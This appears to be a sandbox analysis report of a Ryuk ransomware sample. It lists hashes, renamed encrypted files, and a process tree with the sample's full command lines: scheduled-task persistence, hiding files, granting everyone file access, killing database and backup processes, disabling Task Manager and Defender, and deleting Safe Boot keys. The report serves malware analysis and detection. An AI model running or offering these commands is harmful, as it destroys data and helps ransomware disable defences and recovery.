Analysis
- max time kernel: 150s
- max time network: 125s
- platform: windows7_x64
- resource: win7-20230712-en
- resource tags: arch:x64 arch:x86 image:win7-20230712-en locale:en-us os:windows7-x64 system
- submitted: 19-07-2023 14:04
Static task: static1
Behavioral task: behavioral1
  Sample: ecd9d8ef99eb98exe_JC.exe
  Resource: win7-20230712-en
Behavioral task: behavioral2
  Sample: ecd9d8ef99eb98exe_JC.exe
  Resource: win10v2004-20230703-en
General
- Target: ecd9d8ef99eb98exe_JC.exe
- Size: 889KB
- MD5: ecd9d8ef99eb9813fa4eced549ea4d88
- SHA1: 7db7bff4ca9e94bbfe026c2282f3ce36e423f183
- SHA256: fe4547b20cf40de0e33ed545949f3e0dfef815b5add252d233177386910643a6
- SHA512: 2882d1b8ca5654b142e368f2bcb712bf9d8e3e096aacaf5a5f6ffb62b3062df0245db05e13bdc61ab2bd676349c751b87e8880ab034e73d6cd94e29cc165648b
- SSDEEP: 12288:GFGYwyCMcRzRjWYgeWYg955/155/KQurE+HG8dSyjCtRronBeSrBa:GFGYtSNBQKEmG8HjCXrUVa
Malware Config
- Extracted: C:\ProgramData\RyukReadMe.txt
Signatures

Ryuk
Ransomware distributed via existing botnets, often Trickbot or Emotet.

Renames multiple (5399) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.

Disables Task Manager via registry modification

Drops startup file (3 IoCs)
- File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe (Process: cmd.exe)
- File opened for modification: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe (Process: cmd.exe)
- File opened for modification: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe (Process: attrib.exe)
Modifies file permissions (1 TTPs, 1 IoCs)
- pid 2828, Process: icacls.exe
Enumerates connected drives (3 TTPs, 24 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
All 24 entries are "File opened (read-only)" by Process ecd9d8ef99eb98exe_JC.exe, in the order recorded:
- \??\B:
- \??\O:
- \??\U:
- \??\V:
- \??\W:
- \??\Y:
- \??\Z:
- \??\F:
- \??\H:
- \??\I:
- \??\M:
- \??\N:
- \??\R:
- \??\G:
- \??\J:
- \??\P:
- \??\T:
- \??\E:
- \??\K:
- \??\L:
- \??\A:
- \??\Q:
- \??\S:
- \??\X:
Drops file in Program Files directory (64 IoCs)
All 64 entries are "File opened for modification" by Process ecd9d8ef99eb98exe_JC.exe, in the order recorded:
- C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10253_.GIF.[[email protected]].[8F562417].RYK
- C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.bindings.nl_ja_4.4.0.v20140623020002.jar.[[email protected]].[8F562417].RYK
- C:\Program Files\Java\jre7\lib\zi\America\St_Johns.[[email protected]].[8F562417].RYK
- C:\Program Files\VideoLAN\VLC\locale\ga\LC_MESSAGES\vlc.mo.[[email protected]].[8F562417].RYK
- C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm.[[email protected]].[8F562417].RYK
- C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18211_.WMF.[[email protected]].[8F562417].RYK
- C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0216112.JPG.[[email protected]].[8F562417].RYK
- C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02412K.JPG.[[email protected]].[8F562417].RYK
- C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Swift_Current.[[email protected]].[8F562417].RYK
- C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.servlet_8.1.14.v20131031.jar.[[email protected]].[8F562417].RYK
- C:\Program Files\VideoLAN\VLC\locale\ckb\LC_MESSAGES\vlc.mo.[[email protected]].[8F562417].RYK
- C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif.[[email protected]].[8F562417].RYK
- C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107502.WMF.[[email protected]].[8F562417].RYK
- C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\VDK10.STC.[[email protected]].[8F562417].RYK
- C:\Program Files (x86)\Microsoft Office\Document Themes 14\Clarity.thmx.[[email protected]].[8F562417].RYK
- C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Galapagos.[[email protected]].[8F562417].RYK
- C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.reconciler.dropins.nl_ja_4.4.0.v20140623020002.jar.[[email protected]].[8F562417].RYK
- C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-attach_zh_CN.jar.[[email protected]].[8F562417].RYK
- C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-sampler.jar.[[email protected]].[8F562417].RYK
- C:\Program Files\Java\jre7\lib\zi\Asia\Ust-Nera.[[email protected]].[8F562417].RYK
- C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0301050.WMF.[[email protected]].[8F562417].RYK
- C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18215_.WMF.[[email protected]].[8F562417].RYK
- C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Chihuahua.[[email protected]].[8F562417].RYK
- C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Bishkek.[[email protected]].[8F562417].RYK
- C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\CAPSULES\THMBNAIL.PNG.[[email protected]].[8F562417].RYK
- C:\Program Files (x86)\Common Files\microsoft shared\VBA\VBA7\1033\FM20.CHM.[[email protected]].[8F562417].RYK
- C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00479_.WMF.[[email protected]].[8F562417].RYK
- C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0285926.WMF.[[email protected]].[8F562417].RYK
- C:\Program Files\UseSelect.mhtml.[[email protected]].[8F562417].RYK
- C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\new-trigger-wiz.gif.[[email protected]].[8F562417].RYK
- C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-util-enumerations.xml.[[email protected]].[8F562417].RYK
- C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\EVRGREEN\EVRGREEN.INF.[[email protected]].[8F562417].RYK
- C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0230876.WMF.[[email protected]].[8F562417].RYK
- C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Sakhalin.[[email protected]].[8F562417].RYK
- C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\STUDIO\STUDIO.ELM.[[email protected]].[8F562417].RYK
- C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105332.WMF.[[email protected]].[8F562417].RYK
- C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0185790.WMF.[[email protected]].[8F562417].RYK
- C:\Program Files\VideoLAN\VLC\lua\playlist\appletrailers.luac.[[email protected]].[8F562417].RYK
- C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE00052_.WMF.[[email protected]].[8F562417].RYK
- C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaBrightDemiBold.ttf.[[email protected]].[8F562417].RYK
- C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.nl_zh_4.4.0.v20140623020002.jar.[[email protected]].[8F562417].RYK
- C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-modules.xml.[[email protected]].[8F562417].RYK
- C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf
- C:\Program Files\Java\jre7\bin\server\Xusage.txt.[[email protected]].[8F562417].RYK
- C:\Program Files\VideoLAN\VLC\locale\ff\LC_MESSAGES\vlc.mo.[[email protected]].[8F562417].RYK
- C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\imap.jar.[[email protected]].[8F562417].RYK
- C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0289430.JPG.[[email protected]].[8F562417].RYK
- C:\Program Files (x86)\Microsoft Office\CLIPART\Publisher\Backgrounds\WB02201_.GIF.[[email protected]].[8F562417].RYK
- C:\Program Files\7-Zip\Lang\mng.txt.[[email protected]].[8F562417].RYK
- C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\sunmscapi.jar.[[email protected]].[8F562417].RYK
- C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-8.[[email protected]].[8F562417].RYK
- C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Noumea.[[email protected]].[8F562417].RYK
- C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui_5.5.0.165303.jar.[[email protected]].[8F562417].RYK
- C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\UTC.[[email protected]].[8F562417].RYK
- C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.forms.nl_zh_4.4.0.v20140623020002.jar.[[email protected]].[8F562417].RYK
- C:\Program Files\VideoLAN\VLC\uninstall.log.[[email protected]].[8F562417].RYK
- C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO02578_.WMF.[[email protected]].[8F562417].RYK
- C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\ECLIPSE_.SF.[[email protected]].[8F562417].RYK
- C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator_1.1.0.v20131217-1203.jar.[[email protected]].[8F562417].RYK
- C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\ACEERR.DLL.[[email protected]].[8F562417].RYK
- C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\ACEXBE.DLL.[[email protected]].[8F562417].RYK
- C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE00050_.WMF.[[email protected]].[8F562417].RYK
- C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0337280.JPG.[[email protected]].[8F562417].RYK
- C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO02025_.WMF.[[email protected]].[8F562417].RYK
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).
Creates scheduled task(s) (1 TTPs, 4 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
- pid 2136, Process: schtasks.exe
- pid 2576, Process: schtasks.exe
- pid 2516, Process: schtasks.exe
- pid 2012, Process: schtasks.exe
Kills process with taskkill (2 IoCs)
- pid 2900, Process: taskkill.exe
- pid 2908, Process: taskkill.exe
Suspicious behavior: EnumeratesProcesses (64 IoCs)
- 64 entries, all identical: pid 2660, Process: ecd9d8ef99eb98exe_JC.exe
Suspicious use of AdjustPrivilegeToken (2 IoCs)
- Token: SeDebugPrivilege, pid 2900, Process: taskkill.exe
- Token: SeDebugPrivilege, pid 2908, Process: taskkill.exe
Suspicious use of WriteProcessMemory (64 IoCs)
Columns: description, pid, Process, procid_target. Identical consecutive entries are listed once with their count.
- PID 2660 wrote to memory of 2132 | 2660 | ecd9d8ef99eb98exe_JC.exe | 29 (3 entries)
- PID 2132 wrote to memory of 2136 | 2132 | cmd.exe | 30 (3 entries)
- PID 2660 wrote to memory of 1656 | 2660 | ecd9d8ef99eb98exe_JC.exe | 31 (3 entries)
- PID 2660 wrote to memory of 1876 | 2660 | ecd9d8ef99eb98exe_JC.exe | 32 (3 entries)
- PID 2660 wrote to memory of 2536 | 2660 | ecd9d8ef99eb98exe_JC.exe | 33 (3 entries)
- PID 2536 wrote to memory of 2576 | 2536 | cmd.exe | 34 (3 entries)
- PID 2660 wrote to memory of 2804 | 2660 | ecd9d8ef99eb98exe_JC.exe | 35 (3 entries)
- PID 2804 wrote to memory of 1672 | 2804 | cmd.exe | 36 (3 entries)
- PID 2660 wrote to memory of 2528 | 2660 | ecd9d8ef99eb98exe_JC.exe | 37 (3 entries)
- PID 2528 wrote to memory of 2516 | 2528 | cmd.exe | 38 (3 entries)
- PID 2660 wrote to memory of 2492 | 2660 | ecd9d8ef99eb98exe_JC.exe | 39 (3 entries)
- PID 2492 wrote to memory of 2012 | 2492 | cmd.exe | 40 (3 entries)
- PID 2660 wrote to memory of 2428 | 2660 | ecd9d8ef99eb98exe_JC.exe | 41 (3 entries)
- PID 2428 wrote to memory of 1716 | 2428 | cmd.exe | 42 (3 entries)
- PID 2660 wrote to memory of 2416 | 2660 | ecd9d8ef99eb98exe_JC.exe | 43 (3 entries)
- PID 2416 wrote to memory of 1540 | 2416 | cmd.exe | 44 (3 entries)
- PID 2660 wrote to memory of 1080 | 2660 | ecd9d8ef99eb98exe_JC.exe | 45 (3 entries)
- PID 1080 wrote to memory of 2644 | 1080 | cmd.exe | 46 (3 entries)
- PID 2660 wrote to memory of 1992 | 2660 | ecd9d8ef99eb98exe_JC.exe | 48 (3 entries)
- PID 1992 wrote to memory of 2508 | 1992 | cmd.exe | 49 (3 entries)
- PID 1992 wrote to memory of 2900 | 1992 | cmd.exe | 50 (3 entries)
- PID 2644 wrote to memory of 2828 | 2644 | cmd.exe | 52 (1 entry)
Uses Task Scheduler COM API (1 TTPs)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Views/modifies file attributes (1 TTPs, 3 IoCs)
- pid 1672, Process: attrib.exe
- pid 1716, Process: attrib.exe
- pid 1540, Process: attrib.exe
Processes
Process tree as recorded by the sandbox; indentation shows the parent/child depth, each entry gives the image path, PID, command line and the signatures matched on that process.

[1] C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe (PID 2660)
    Command line: "C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe"
    - Enumerates connected drives
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory

  [2] C:\Windows\system32\cmd.exe (PID 2132)
      Command line: C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\schtasks.exe (PID 2136)
        Command line: schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F
        - Creates scheduled task(s)

  [2] C:\Windows\system32\cmd.exe (PID 1656)
      Command line: C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
      - Drops startup file

  [2] C:\Windows\system32\cmd.exe (PID 1876)
      Command line: C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

  [2] C:\Windows\system32\cmd.exe (PID 2536)
      Command line: C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\schtasks.exe (PID 2576)
        Command line: schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F
        - Creates scheduled task(s)

  [2] C:\Windows\system32\cmd.exe (PID 2804)
      Command line: C:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\attrib.exe (PID 1672)
        Command line: attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
        - Drops startup file
        - Views/modifies file attributes

  [2] C:\Windows\system32\cmd.exe (PID 2528)
      Command line: C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe" /RU SYSTEM /RL HIGHEST /F
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\schtasks.exe (PID 2516)
        Command line: schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe" /RU SYSTEM /RL HIGHEST /F
        - Creates scheduled task(s)

  [2] C:\Windows\system32\cmd.exe (PID 2492)
      Command line: C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe" /F
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\schtasks.exe (PID 2012)
        Command line: schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\ecd9d8ef99eb98exe_JC.exe" /F
        - Creates scheduled task(s)

  [2] C:\Windows\system32\cmd.exe (PID 2428)
      Command line: C:\Windows\system32\cmd.exe /c attrib +h +s ryuk.exe
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\attrib.exe (PID 1716)
        Command line: attrib +h +s ryuk.exe
        - Views/modifies file attributes

  [2] C:\Windows\system32\cmd.exe (PID 2416)
      Command line: C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\ryuk.exe
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\attrib.exe (PID 1540)
        Command line: attrib +h +s C:\ProgramData\ryuk.exe
        - Views/modifies file attributes

  [2] C:\Windows\system32\cmd.exe (PID 1080)
      Command line: C:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\cmd.exe (PID 2644)
        Command line: cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\icacls.exe (PID 2828)
          Command line: icacls * /grant Everyone:(OI)(CI)F /T /C /Q
          - Modifies file permissions

  [2] C:\Windows\system32\cmd.exe (PID 1992)
      Command line: C:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\cmd.exe (PID 2508)
        Command line: cmd.exe /c taskkill /t /f /im sql*
      [4] C:\Windows\system32\taskkill.exe (PID 2908)
          Command line: taskkill /t /f /im sql*
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\system32\taskkill.exe (PID 2900)
        Command line: taskkill /f /t /im veeam*
        - Kills process with taskkill
        - Suspicious use of AdjustPrivilegeToken

  [2] C:\Windows\system32\cmd.exe (PID 2844)
      Command line: C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
    [3] C:\Windows\system32\reg.exe (PID 844)
        Command line: reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f

  [2] C:\Windows\system32\cmd.exe (PID 3052)
      Command line: C:\Windows\system32\cmd.exe /c Copy hrmlog1 C:\ProgramData\hrmlog1

  [2] C:\Windows\system32\cmd.exe (PID 2156)
      Command line: C:\Windows\system32\cmd.exe /c Copy hrmlog2 C:\ProgramData\hrmlog2

  [2] C:\Windows\system32\cmd.exe (PID 2856)
      Command line: C:\Windows\system32\cmd.exe /c Copy RYUKID C:\ProgramData\RYUKID

  [2] C:\Windows\system32\cmd.exe (PID 2712)
      Command line: C:\Windows\system32\cmd.exe /c Copy C:\ProgramData\hrmlog1 %userprofile%\Desktop\hrmlog1

  [2] C:\Windows\system32\cmd.exe (PID 2772)
      Command line: C:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\RyukReadMe.txt " "%userprofile%\Desktop\RyukReadMe.txt "

  [2] C:\Windows\system32\cmd.exe (PID 2480)
      Command line: C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    [3] C:\Windows\system32\reg.exe (PID 372)
        Command line: reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

  [2] C:\Windows\system32\cmd.exe (PID 1924)
      Command line: C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    [3] C:\Windows\system32\reg.exe (PID 1608)
        Command line: reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

  [2] C:\Windows\system32\cmd.exe (PID 2808)
      Command line: C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
    [3] C:\Windows\system32\reg.exe (PID 3008)
        Command line: reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F

  [2] C:\Windows\system32\cmd.exe (PID 584)
      Command line: C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
    [3] C:\Windows\system32\reg.exe (PID 2944)
        Command line: reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
Network
MITRE ATT&CK Enterprise v6
Downloads

- Filesize: 144B
  MD5: 2d581d7f41be876ce36523d0a7f2a64a
  SHA1: 279f1b7f8936ab44e75bec3695d68569d8bbca9e
  SHA256: 53c9308d8e9a7949f9348038493d87aa1218a148f404a7c340f7d47525ea90dd
  SHA512: 4caf790b2d8feb5b2e9bab0ede191cff81a1547221408255e17e5e549a1fcd3615ea502d6d55b843c50a0eeac0bad13a2261d03f8b580ce6a592298340071c53

- Filesize: 1KB
  MD5: 82ea3d2f6fc005352ce69909570def3d
  SHA1: a43c1be5adc6a957d8a4ed727c3d1d5c648b6397
  SHA256: 56edcf4ec31883a101939b9fb4149d4944f00be0663a4a339afbc0910ea085bc
  SHA512: 197d2e2e5208de3c338ecc383b0fe016c8b5148d476640b6d1a7054f9417e698070edf38376359a26d43a7c6240d0362744f8fd416d46f723d492f230af1a440

- Filesize: 889KB
  MD5: ecd9d8ef99eb9813fa4eced549ea4d88
  SHA1: 7db7bff4ca9e94bbfe026c2282f3ce36e423f183
  SHA256: fe4547b20cf40de0e33ed545949f3e0dfef815b5add252d233177386910643a6
  SHA512: 2882d1b8ca5654b142e368f2bcb712bf9d8e3e096aacaf5a5f6ffb62b3062df0245db05e13bdc61ab2bd676349c751b87e8880ab034e73d6cd94e29cc165648b

- Filesize: 8B
  MD5: 609261b3d4e430ff93b8c8cdca7be429
  SHA1: cd2be2be6cab95914147dd192c288b5e43f95d2b
  SHA256: b5140db3c4d5379b0fbb53d8952b3235297f0c786d4c5a282d8c2b06939252d3
  SHA512: 4d6d383b4ba112f9be8add0b051769852dd219a35f0ec45c407fd8ec54644b1d13f3af4e4d88d4f65c2c88c20916fdff6318b583e9cfb8def1f2d9022334fb2f

- Filesize: 1KB
  MD5: 82ea3d2f6fc005352ce69909570def3d
  SHA1: a43c1be5adc6a957d8a4ed727c3d1d5c648b6397
  SHA256: 56edcf4ec31883a101939b9fb4149d4944f00be0663a4a339afbc0910ea085bc
  SHA512: 197d2e2e5208de3c338ecc383b0fe016c8b5148d476640b6d1a7054f9417e698070edf38376359a26d43a7c6240d0362744f8fd416d46f723d492f230af1a440

- Filesize: 8KB
  MD5: 87266b0a2f17c202002a02cdf7a14feb
  SHA1: c26e1d9d95c6c77383925af484e5fa1bff6b42bb
  SHA256: a5bb0c2b1712094e6e2572edd0ff859546b6c75b9cf6d4aa87bcca9e5ece110c
  SHA512: 651db30b17b5521a98f88a53a49ebc5527dba0de4d3daadc4fbcc97a536385a18db68dcf190de14579ce3b1e12983e19efb7c5b9c460a5f4fa2b58f83c0ece68

- Filesize: 8KB
  MD5: 87266b0a2f17c202002a02cdf7a14feb
  SHA1: c26e1d9d95c6c77383925af484e5fa1bff6b42bb
  SHA256: a5bb0c2b1712094e6e2572edd0ff859546b6c75b9cf6d4aa87bcca9e5ece110c
  SHA512: 651db30b17b5521a98f88a53a49ebc5527dba0de4d3daadc4fbcc97a536385a18db68dcf190de14579ce3b1e12983e19efb7c5b9c460a5f4fa2b58f83c0ece68

- Filesize: 8KB
  MD5: 87266b0a2f17c202002a02cdf7a14feb
  SHA1: c26e1d9d95c6c77383925af484e5fa1bff6b42bb
  SHA256: a5bb0c2b1712094e6e2572edd0ff859546b6c75b9cf6d4aa87bcca9e5ece110c
  SHA512: 651db30b17b5521a98f88a53a49ebc5527dba0de4d3daadc4fbcc97a536385a18db68dcf190de14579ce3b1e12983e19efb7c5b9c460a5f4fa2b58f83c0ece68

- Filesize: 292B
  MD5: 4fd17a6fe54d7ef1d007d3bab3ff5fce
  SHA1: 4b76934d7e6214db44d83777899bd69db3294435
  SHA256: 402441604ef88d76bbfa022d945514b7b6218997238175ca6c9925d0ad000e6b
  SHA512: bece45130c568e1d392b08bde6b1dc44b443b6da26f74df4d4ec38f0a53f7b0315eaf1638e1599d947179895e04a1ee0e182b168e33add26492c8175364f20b3

- Filesize: 292B
  MD5: 4fd17a6fe54d7ef1d007d3bab3ff5fce
  SHA1: 4b76934d7e6214db44d83777899bd69db3294435
  SHA256: 402441604ef88d76bbfa022d945514b7b6218997238175ca6c9925d0ad000e6b
  SHA512: bece45130c568e1d392b08bde6b1dc44b443b6da26f74df4d4ec38f0a53f7b0315eaf1638e1599d947179895e04a1ee0e182b168e33add26492c8175364f20b3

- Filesize: 889KB
  MD5: ecd9d8ef99eb9813fa4eced549ea4d88
  SHA1: 7db7bff4ca9e94bbfe026c2282f3ce36e423f183
  SHA256: fe4547b20cf40de0e33ed545949f3e0dfef815b5add252d233177386910643a6
  SHA512: 2882d1b8ca5654b142e368f2bcb712bf9d8e3e096aacaf5a5f6ffb62b3062df0245db05e13bdc61ab2bd676349c751b87e8880ab034e73d6cd94e29cc165648b

- Filesize: 8B
  MD5: 609261b3d4e430ff93b8c8cdca7be429
  SHA1: cd2be2be6cab95914147dd192c288b5e43f95d2b
  SHA256: b5140db3c4d5379b0fbb53d8952b3235297f0c786d4c5a282d8c2b06939252d3
  SHA512: 4d6d383b4ba112f9be8add0b051769852dd219a35f0ec45c407fd8ec54644b1d13f3af4e4d88d4f65c2c88c20916fdff6318b583e9cfb8def1f2d9022334fb2f

- Filesize: 8KB
  MD5: 87266b0a2f17c202002a02cdf7a14feb
  SHA1: c26e1d9d95c6c77383925af484e5fa1bff6b42bb
  SHA256: a5bb0c2b1712094e6e2572edd0ff859546b6c75b9cf6d4aa87bcca9e5ece110c
  SHA512: 651db30b17b5521a98f88a53a49ebc5527dba0de4d3daadc4fbcc97a536385a18db68dcf190de14579ce3b1e12983e19efb7c5b9c460a5f4fa2b58f83c0ece68

- Filesize: 292B
  MD5: 4fd17a6fe54d7ef1d007d3bab3ff5fce
  SHA1: 4b76934d7e6214db44d83777899bd69db3294435
  SHA256: 402441604ef88d76bbfa022d945514b7b6218997238175ca6c9925d0ad000e6b
  SHA512: bece45130c568e1d392b08bde6b1dc44b443b6da26f74df4d4ec38f0a53f7b0315eaf1638e1599d947179895e04a1ee0e182b168e33add26492c8175364f20b3

- Filesize: 889KB
  MD5: ecd9d8ef99eb9813fa4eced549ea4d88
  SHA1: 7db7bff4ca9e94bbfe026c2282f3ce36e423f183
  SHA256: fe4547b20cf40de0e33ed545949f3e0dfef815b5add252d233177386910643a6
  SHA512: 2882d1b8ca5654b142e368f2bcb712bf9d8e3e096aacaf5a5f6ffb62b3062df0245db05e13bdc61ab2bd676349c751b87e8880ab034e73d6cd94e29cc165648b